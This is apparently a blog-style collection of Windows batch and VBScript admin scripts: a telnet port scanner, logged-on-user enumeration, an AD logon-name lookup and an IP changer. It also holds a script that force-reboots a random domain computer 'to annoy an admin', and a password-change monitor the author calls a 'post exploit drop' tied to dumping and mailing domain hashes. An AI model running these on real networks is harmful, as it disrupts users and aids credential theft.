You're stuck in a network without internet access, you don't have a port scanner with you, can't leave to get one, no other options..... what do you do? WHAT DO YOU DO????

Thus was born the Ghetto as All Get Out Port Scanner. What an ugly bit of code.

This was being built into a larger script so there's some stuff missing here obviously. The file ~temp2 would have the list of IP addresses. You would need to change the port (9100 in this case) or assign a new variable to handle running through the ports you wanted to check.

Of course you need telnet installed; the telnet client is off by default on Vista/7 (it's an optional Windows feature an admin can turn on), so out of the box this won't run there.

-=The Script=-

@echo off
:: ~temp2 holds one IP per line (see the ping scan above).
if exist up.txt del /f /q up.txt
for /f %%i in (~temp2) do (
    start /min telnet %%i 9100
    rem ~4 seconds for the handshake; ping -n 5 to localhost is the classic batch sleep
    ping -n 5 127.0.0.1 > nul
    rem an ESTABLISHED socket to ip:9100 means the port answered
    netstat -n | find /i "%%i:9100" | find /i "Established" && echo %%i >> up.txt
    taskkill /f /IM telnet.exe > nul 2>&1
)
exit
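For the same situation without a telnet client, here is a TCP connect scanner as an added Python example (mine, not the post's script). A connect() that completes means open, a refused connection (RST) means closed, and a timeout means filtered or no host at all; there is no race with netstat and nothing to taskkill. self_test binds a listener on loopback so the example can be checked offline; the hosts file and ports on the command line are whatever you have, 9100 being the printer port the post used.

```python
"""Minimal TCP connect scanner, the replacement for the telnet/netstat trick.

Added example, not the post's script.  Reads hosts from a file with one IP per
line (the post's ~temp2) and probes the ports given on the command line.
"""
import socket
import sys
from concurrent.futures import ThreadPoolExecutor


def probe(host: str, port: int, timeout: float = 1.0) -> str:
    """'open', 'closed' or 'filtered' for one host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:          # timeout, host unreachable, name resolution failure
        return "filtered"


def scan(hosts, ports, timeout: float = 1.0, workers: int = 64) -> list:
    """Sorted [(host, port)] that are open; all host x port probes run in parallel."""
    targets = [(h, p) for h in hosts for p in ports]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda t: probe(t[0], t[1], timeout), targets))
    return sorted(t for t, state in zip(targets, states) if state == "open")


def self_test() -> bool:
    """Bind a loopback listener and confirm the scanner reports it open and a
    freshly released loopback port closed (lets the example be checked offline)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    spare = socket.socket()
    spare.bind(("127.0.0.1", 0))
    open_port, closed_port = srv.getsockname()[1], spare.getsockname()[1]
    spare.close()
    try:
        return (scan(["127.0.0.1"], [open_port, closed_port]) == [("127.0.0.1", open_port)]
                and probe("127.0.0.1", closed_port) == "closed")
    finally:
        srv.close()


if __name__ == "__main__":
    # usage: scanner.py hosts.txt 9100 445 3389   (hosts.txt: one IP per line)
    with open(sys.argv[1]) as f:
        hosts = [line.strip() for line in f if line.strip()]
    for host, port in scan(hosts, [int(p) for p in sys.argv[2:]] or [9100]):
        print(host, port)
```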

Make a list of who is currently logged on to all computers

I wanted to start keeping a running sheet on who was logged in where so I wrote this guy up. Dumps a list from net view and parses it out, then does a for loop to run a wmic command to see who's actively logged on to a computer. Two limits worth knowing: Win32_ComputerSystem's UserName is only the console (interactive) logon, so RDP sessions and service accounts don't show, and wmic is deprecated on current Windows, where the same query is Get-CimInstance Win32_ComputerSystem.

-=The Script=-

@echo off
:: Start from clean scratch files; every step below appends.
for %%f in (list.txt list2.txt parsed0.txt parsed1.txt) do if exist C:\%%f del /f /q C:\%%f
net view >> C:\list.txt
:: net view: 3 header lines, then "\\HOST  remark" rows, then "The command completed successfully."
for /F "skip=3 tokens=1" %%c IN (C:\list.txt) DO echo %%c >> c:\parsed0.txt
for /f %%G in (C:\parsed0.txt) do if NOT %%G==The echo %%G >> C:\parsed1.txt
for /F "delims=\\ tokens=1" %%g IN (C:\parsed1.txt) DO echo %%g >> C:\list2.txt
del /f /q C:\parsed0.txt > nul
del /f /q C:\parsed1.txt > nul
del /f /q C:\list.txt
echo List Generated
:: computersystem.username is the console user as DOMAIN\user (blank if nobody is logged on);
:: /failfast trims the wait on hosts that are off. "Full Name" comes from net user.
for /f %%i in (C:\list2.txt) do (
    for /f "skip=1" %%v in ('wmic /failfast:2000 /node:%%i computersystem get username') do (
        for /f "tokens=2 delims=\" %%c in ("%%v") do (
            for /f "tokens=3,4" %%f in ('net user %%c /domain ^|find /i "Full Name"') do echo %%i %%v %%f %%g >> C:\whosthere.txt
        )
    )
)
echo Done.
del /f /q C:\list2.txt
Pause > nul

Retrieve logon name from Human Name

I hate it when I can't do something in pure batch. But sometimes you just gotta bite the bullet and use another language. Here's a (choke, vomit) VBS script to return the logon name given a user's display name.

And right now all of you that are saying "well that's retarded their username is just first initial last name" well not everyone rolls like that. Sometimes users get assigned random ass strings as their logon names and it gets pretty freaking annoying having to connect to the DC, find the user, look up their logon name.

You'll need to modify the LDAP base (the dc=ACME,dc=local part of the CommandText) to match your own domain.

Now that I think about this I may have swiped this from somewhere else, I don't remember. If so sorry about not giving credit where credit is due...

-=The Script=-

On Error Resume Next

Const ADS_SCOPE_SUBTREE = 2

strAnswer = InputBox("Please enter in Display Name for User you want Logon Name for:", _
    "Logon Name")
If strAnswer = "" Then Wscript.Quit
' The display name is spliced straight into the query text, so a name with a
' single quote (O'Brien) breaks it; double the quotes, as the ADO SQL dialect expects.
strAnswer = Replace(strAnswer, "'", "''")

Set objConnection = CreateObject("ADODB.Connection")
Set objCommand =   CreateObject("ADODB.Command")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCommand.ActiveConnection = objConnection

objCommand.Properties("Page Size") = 1000
objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE

' Replace dc=ACME,dc=local with your domain's naming context.
objCommand.CommandText = _
    "SELECT sAMAccountName FROM 'LDAP://dc=ACME,dc=local' WHERE objectCategory='user' " & _
        "AND displayName = '" & strAnswer & "'"
Set objRecordSet = objCommand.Execute

' Execute leaves the cursor on the first row; an empty result just means no match.
If objRecordSet.EOF Then Wscript.Echo "No user with that display name."
Do Until objRecordSet.EOF
    Wscript.Echo objRecordSet.Fields("sAMAccountName").Value
    objRecordSet.MoveNext
Loop

Now that I think about it, I think I can do this in batch... I'll update this if I get time to do it.
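One thing to be aware of with the VBS above: the display name goes into the query by string concatenation, and in the ADSI SQL dialect, as in an LDAP filter, `*` is a wildcard, so typing `*` lists every user and a crafted value can rewrite the query. Here is the same lookup expressed as an RFC 4515 LDAP search filter with the value escaped, as an added Python example (mine, not the post's script, and a different query syntax from the VBS: this filter is what ldapsearch, ldap3 or Get-ADUser -LDAPFilter accept). The naive version is kept beside it to show what the escaping prevents.

```python
"""Build the display-name lookup as an LDAP filter with RFC 4515 value escaping.

Added example, not the post's script.  naive_filter() reproduces the VBS habit of
concatenating the typed value; safe_filter() escapes it.  The query shape is the
usual user lookup; no directory is contacted here.
"""

# RFC 4515 section 3: these characters inside an assertion value must be \XX-escaped.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape one assertion value so it can only ever match literally."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def naive_filter(display_name: str) -> str:
    """What the VBS effectively does: splice the input in unescaped."""
    return f"(&(objectCategory=person)(objectClass=user)(displayName={display_name}))"


def safe_filter(display_name: str) -> str:
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(displayName={escape_filter_value(display_name)}))")


def node_count(ldap_filter: str) -> int:
    """Number of filter nodes (the '&' list plus each '(attr=value)' leaf) the
    server will parse.  A count that grows with the input means the input
    rewrote the query rather than being matched as a value."""
    return ldap_filter.count("(")


if __name__ == "__main__":
    for typed in ("John Doe", "O'Brien", "*", "*)(userAccountControl=*"):
        print(f"{typed!r:28} naive={node_count(naive_filter(typed))} "
              f"safe={node_count(safe_filter(typed))}  {safe_filter(typed)}")
```

With `*)(userAccountControl=*` the naive filter gains a clause (five nodes instead of four) and matches every enabled user; the escaped one is a four-node filter looking for a display name that is literally that string.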

Change IP Script

Got tired of all the clicking and right clicking to change my interface address one day while setting up a bunch of equipment that lived in different subnets.

-=The Script=-


@echo off
title Set IP
echo Which Interface?
netsh interface show interface
set /p int=
cls
echo Interface %int%
Echo Static (s) or DHCP (d)
set /p con=
if /i "%con%"=="s" goto setip
if /i "%con%"=="d" goto dhcp
echo Unknown choice, nothing changed.
pause
exit

:setip
cls
echo Interface %int%
Echo Enter IP Address
set /p ipadd=
echo Enter Subnet Mask
set /p subnet=
echo Enter Default Gateway
set /p defgat=
echo Do you want to set DNS servers also? (y/n)
set /p ans=
if /i "%ans%"=="y" goto sdns
echo DNS servers will not be set.
Echo Setting IP Address...
:: the trailing 1 is the gateway metric; this and the DNS changes need an elevated prompt
netsh interface ip set address "%int%" static %ipadd% %subnet% %defgat% 1
pause
exit

:sdns
cls
echo DNS Server Setup
echo Enter the IP address of the first dns server
set /p one=
echo Enter the IP address of the second dns server
set /p two=
Echo Setting IP Address...
netsh interface ip set address "%int%" static %ipadd% %subnet% %defgat% 1
echo Setting DNS 1...
:: "set dns ... static" replaces whatever list an earlier run left behind; "add dns" only appends
netsh interface ip set dns "%int%" static %one%
echo Adding DNS 2...
netsh interface ip add dns "%int%" %two% index=2
pause
exit

:dhcp
cls
Echo Interface %int%
echo Setting Interface to DHCP...
netsh interface ip set address "%int%" dhcp
:: otherwise static DNS servers from an earlier run stay pinned to the interface
netsh interface ip set dns "%int%" dhcp
pause
exit

Random Remote Shutdown

Old script I wrote up one day while thinking about how to best randomly annoy an admin. I never finished the full plan for this, maybe someday. Anyway, what it does is dump a list of the current computers from net view and parse it out. It generates a random number by adding two %random% values, counts how many items are in the parsed list, and checks whether the poorbastard variable is less than or equal to the number of items; if not, it removes the first digit from poorbastard and rechecks until it is. Then it issues a remote shutdown to that computer. Obviously you need admin rights on the remote computer for this to function.

-=The Script=-

@echo off
for %%f in (list.txt list2.txt parsed0.txt parsed1.txt) do if exist C:\%%f del /f /q C:\%%f
net view >> C:\list.txt
for /F "skip=3 tokens=1" %%c IN (C:\list.txt) DO echo %%c >> c:\parsed0.txt
for /f %%G in (C:\parsed0.txt) do if NOT %%G==The echo %%G >> C:\parsed1.txt
for /F "delims=\\ tokens=1" %%g IN (C:\parsed1.txt) DO echo %%g >> C:\list2.txt
del /f /q C:\parsed0.txt > nul
del /f /q C:\parsed1.txt > nul
del /f /q C:\list.txt
:: V = number of hosts in the list
for /f %%f in ('find /v /c ^"The command completed successfully.^" ^< C:\list2.txt') do set /a V=%%f
:: Pick a 1-based index: sum two %random% draws, then drop leading digits until it fits.
set /a poorbastard=%random%+%random%
echo %poorbastard%
if %poorbastard% LEQ %v% goto kill
if %poorbastard% GTR %v% goto minus50dkp
:minus50dkp
set poorbastard=%poorbastard:~1%
if %poorbastard% LEQ %v% goto kill
if %poorbastard% GTR %v% goto minus50dkp
:kill
setlocal ENABLEDELAYEDEXPANSION
set /a n=1
for /f %%a in (C:\list2.txt) do (
if /I !n! equ %poorbastard% set saygoodnight=%%a
set /a n=!n! + 1
)
echo %poorbastard%
echo %saygoodnight%
:: the digit stripping can land on 0, which matches no host; bail rather than shutdown \\
if "%saygoodnight%"=="" (echo Index %poorbastard% matched nothing, run it again & goto done)
shutdown -r -m \\%saygoodnight% -t 00 -c "LEEEEEEEEEEROOOOOOOOY jenkins!!!!!!"
:done
endlocal
pause

Find domain users who changed their passwords today

Wrote this one up just to see if I could. Thought it might make for a good post exploit drop in case you wanted to monitor which users changed their passwords, maybe have it trigger a fresh dump of the domain hashes and mail them to you or post them somewhere. Whatever.

Spits out some errors about user names not found sometimes (most likely names longer than net user's column width, which it truncates in the listing) but it seems to get the job done.

-=The Script=-

@echo off
Echo +Getting User List

:: net user /domain prints names three per row after a 6-line header
for /f "tokens=1,2,3 skip=6" %%a in ('net user /domain') do echo %%a >> C:\people.txt && echo %%b >> C:\people.txt && echo %%c >> C:\people.txt

Echo +Cleaning User List

:: "echo" of an empty token prints "ECHO is on.", and the trailer line gets split into
:: "The", "command", "completed"; drop all of those.
for /f "tokens=*" %%d in (C:\people.txt) do if not "%%d" == "ECHO is on." if not "%%d" == "ECHO is off." if not "%%d" == "The  " if not "%%d" == "command  " if not "%%d" == "completed " echo %%d >> C:\cleanpeople.txt

del /f /q C:\people.txt

Echo +Setting Time Variables

:: Assumes %date% looks like "Fri 03/23/2012" (US locale) and that net user prints
:: "Password last set" as M/D/YYYY, so leading zeros are stripped to match.
if 0 == %date:~4,1% set mn=%date:~5,1%
if not 0 == %date:~4,1% set mn=%date:~4,2%

if 0 == %date:~7,1% set dy=%date:~8,1%
if not 0 == %date:~7,1% set dy=%date:~7,2%

set now=%mn%/%dy%/%date:~10,4%

Echo +Finding Active Accounts

:: "Account active               Yes" -> token 3
for /f %%g in (C:\cleanpeople.txt) do for /f "tokens=3" %%h in ('net user %%g /domain ^| find /i "Account Active"') do if %%h == Yes echo %%g >> C:\activecleanpeople.txt

del /f /q C:\cleanpeople.txt

cls

Echo +Finding Users Who Changed Their Passwords Today

:: "Password last set            3/23/2012 9:15:02 AM" -> token 4 is the date
for /f %%e in (C:\activecleanpeople.txt) do for /f "tokens=4" %%f in ('net user %%e /domain ^| find /i "Password last set"') do if %%f == %now% echo %%e changed their password today

del /f /q C:\activecleanpeople.txt

Echo Finished.
pause > nul